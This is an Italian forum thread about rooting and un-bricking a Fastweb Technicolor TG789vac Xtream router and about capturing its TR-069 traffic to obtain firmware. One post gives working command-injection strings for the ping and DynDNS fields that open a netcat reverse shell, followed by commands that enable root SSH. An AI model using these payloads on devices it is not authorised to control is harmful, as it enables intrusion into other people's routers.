[matteone2]

Ciao a tutti,
dopo vari esperimenti sui DGA4130/4132 mi sono buttato sul 789vac xtream 35b di Fastweb.
Risultato: un bel brick    perchè ho sbagliato un erase mtd (oops...)

Il router mi va in BOOT-P e si aspetta un firmware, ho cercato in giro e di .rbi neppure l'ombra,
Qualcuno ha trovato il file sul loro server ACS 59.0.121.191 oppure gli xtream usano altro server ?

Resta poi il problema del nome file, partendo da questi firmware noti:
 
16.2.7384-2341002-20170104120722_FW_209_MOS_TG789vacXtream
16.2.7825-3401002-20170627172939_FW_212_MOS_TG789vacXtream

mi sarei aspettato qualcosa nella forma 16.2.n.y_FW_xxx_MOS_TG789vacXtream.rbi (almeno in precedenti router usavano questo standard) ma per ora nulla

[varma]

Ciao a tutti,
Mi allaccio a questo thread visto che ho appena ricevuto in regalo questo router fastweb.
Ho fatto una ricerca nel forum ma non sono riuscito a capire se sono stati trovati utilizzi per questo router.
A me tornerebbe utile usarlo come modem adsl per altro operatore e sfruttare le porte VoIP con Messagenet. Ci sono firmware adatti allo scopo?
Che guide o thread di router "cugini" potrei seguire per mettermi a "far danni"??

[matteone2]

Per il root, ci sono vari metodi in funzione della versione firmware. Se riesci a darmi i dati della pagina "Informazioni Globali"
ti indico la procedura.

Serve un minimo di dimestichezza con la riga comandi, ma non è complicato

[varma]

Queste sono le info generiche ricavate dalla GUI

Codice: [Seleziona]

Fornitore del prodotto

Technicolor


Nome prodotto

Technicolor TG789vac Xtream_MOS


Versione Software

16.2


Versione Firmware

16.2.7825-3401002-20170627172939_FW_212_MOS_TG789vacXtream


Versione Bootloader

15.50.1005-0000000-20151209073757-4fd17452ef9fdf09e9f981340e5d6b3f85fe6c5a


Versione Hardware

VBNT-F

https://photos.app.goo.gl/F3Ha0tgYuTaCk6iy2

qui alcune foto. siccome vicino alle porte FXS vedo pochi componenti elettronici mi è salito un dubbio...saranno attive? o è un modello senza VOIP?

in caso, siccome sono principalmente interessato all'utilizzo VOIP, vale la pena che recupero un TG789VAC2_MOS? l'ho dato ad un amico per una connessione Fastweb. lui lo usa vergine con una VDSL Fastweb. magari a lui do' l'Xtream e io riprendo quello, visto che dal quel che vedo sul forum quel modello è stato sbloccato per bene.

Che mi consigliate?   

[^NiCo^]

Bel clone del dga4130, le porte voip funzionano, la componentistica mancante che sia del dect ? guarda le foto della board del dga4130.

Vedo anche che il nome della board è lo stesso del tim hub (VBNT-S) ?  che sia fattibile mettere su il fw del tim hub e viceversa ?

Anche quello li è sbloccabile, con la 16.2 la falla nel campo del ping funziona, e credo funzioni anche quella del dyndns.

[matteone2]

Sulle 16.2 la falla del dyndns funziona, mentre quella del ping dipende dalla versione (tra 16.2.7384 e 16.2.7825 ho comportamenti diversi).
Invece sulla 16.1 funziona quella del ping , ma non quella del dyndns (!)

In ogni caso, ho dovuto usare delle sintassi leggermente diverse per il root rispetto ai DGA: i comandi sono piu vicini a quelli degli AGTOT.
Quando rientro posto la procedura

@^NiCo^  la board è VBNT-S  ma la flash è grande la metà ... alla prima occasione provo il TFTP su un Xtream brickato che ho, ti faccio sapere

**EDIT**  Mi correggo, la board è VBNT-F

[freddy0h]

mettici iinet o il firmware uno la board e' compatibile

[freddy0h]

Sulle 16.2 la falla del dyndns funziona, mentre quella del ping dipende dalla versione (tra 16.2.7384 e 16.2.7825 ho comportamenti diversi).
Invece sulla 16.1 funziona quella del ping , ma non quella del dyndns (!)

In ogni caso, ho dovuto usare delle sintassi leggermente diverse per il root rispetto ai DGA: i comandi sono piu vicini a quelli degli AGTOT.
Quando rientro posto la procedura

@^NiCo^  la board è VBNT-S  ma la flash è grande la metà ... alla prima occasione provo il TFTP su un Xtream brickato che ho, ti faccio sapere

> usano tutti e due openrg

[matteone2]

Eccomi!
La procedura di root che mi funziona è questa (è un mix di quelle che abbiamo visto su AGTOT e AGTEF/AGTHP) :

1- Assicuratevi di non avere firewall attivi sul PC

2- Collegate il router al PC ed annotatevi l'IP che utilizza questo ultimo

3- Lanciare netcat in ascolto sul PC (esiste anche la versione windows, si scarica facilmente)
nc -lvvp 10001
"10001" è la porta TCP di ascolto, potete usare una porta alta ( 1024-65535 ) qualunque. La 10001 è quella che si trova in tanti esempi

4-  Aprite la pagina di diagnostica -> Ping & Traceroute -> nella sezione "indirizzi IP" inserite:

:::::::;nc IP_DEL_PC 10001 -e /bin/sh

e lanciate il test del ping. Sul PC dovrebbe comparire la scritta "connected to IP_DEL_ROUTER"
 
5- adesso sul PC lanciate i comandi per attivare l'utenza root ed il servizio SSH dropbear:

passwd root
<inventatevi una password di root - va inserita e poi confermata>

uci set dropbear.@dropbear[0].PasswordAuth='on'
uci set dropbear.@dropbear[0].Interface='lan'
uci set dropbear.@dropbear[0].RootPasswordAuth='on'
uci set dropbear.@dropbear[0].RootLogin='1'
uci set dropbear.@dropbear[0].enable='1'
uci commit
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd
/etc/init.d/dropbear restart

FINE!

Se il punto 4 non funziona provate con il servizio DynDNS:

4b- Aprite pagina “Servizi WAN”, andate nella nella sezione DDNS e inserite questa stringa nel campo “Dominio”:
 
www.ooo.com; nc IP_DEL_PC 10001 -e /bin/sh &

Attivate il servizio DynDNS e infine salvate

mettici iinet o il firmware uno la board e' compatibile

Sei sicuro che "TG789vac Xtream 35b" sia compatibile ? Mi sembra di avere provato senza successo.
**EDIT** Ho verificato, mi sembra che iinet ed uno utilizzino la board VANT-6  mentre questo ha la VBNT-F
servirebbe il firmware di un router con stessa board (e forse anche la chiave AES per il decrypt del file .rbi)

Help me! 

[matteone2]

Sto ancora cercando di recuperare un firmware per questo router... avendo un secondo xtream 35b con la 16.1 e rootato, l'ho collegato alla rete fastweb ed ho visto che acquisisce automaticamente la configurazione del server ACS (quella del noto 59.0.121.191:8080/ACS-server/ACS ).

Facendo un tcpdump sull'interfaccia atm0 si nota che il dialogo tra router ed ACS è in chiaro... ho provato a tenerlo collegato una notte intera con tcpdump attivo, sperando di veder arrivare il firmware (o quantomeno un URL oppure il nome del file .bli) ma niente.

C'è qualcuno che vuole fare questa prova di tcpdump? Ah, per non rischiare di riempire il filesystem del router con il file generato da tcpdump io suggerisco di far scrivere su una chiavetta usb

[LuKePicci]

Posso fare questa prova che dici ma mi occorre il dump della sessione cwmp che hai catturato. Mi occorre solo il contenuto soap ovviamente, cerca di censurarlo se necessario e mandamelo.

edit (marzo 2019): dopo aver dato una occhiata al dump di questo firmware ho potuto fare queste prove e recuperare gli RBI originali per questo device, Li trovate nella repo di Ansuel.

[matteone2]

Mah ... nelle buste soap ci sono varie informazioni interessanti ma non ho visto un modo per "stimolare" il donwload  del firmware.  Appena possibile (non ho più la linea fastweb) provo a fare un altro tcpdump e ti faccio sapere

[LuKePicci]

Il download viene comandato dall.acs o da pianificazione o al verificarsi di certe condizioni durante eventi in particolare. Per esempio Vodafone pusha il firmware aggiornato se nella inform di bootstrap compare una versione firmware obsoleta. Sarebbe meglio se il dump fosse di una sessione di bootstrap, cioè durante il primo avvio post-reset, ma già dalla generica inform si può fare qualche tentativo.

[matteone2]

La sessione di bootstrap si ha solo al riavvio del dispositivo oppure è sufficiente un riavvio del demone cwmpd ?

[LuKePicci]

No l'evento di "bootstrap" è solo dopo un factory reset, dopo il riavvio avviene il normale evento "boot"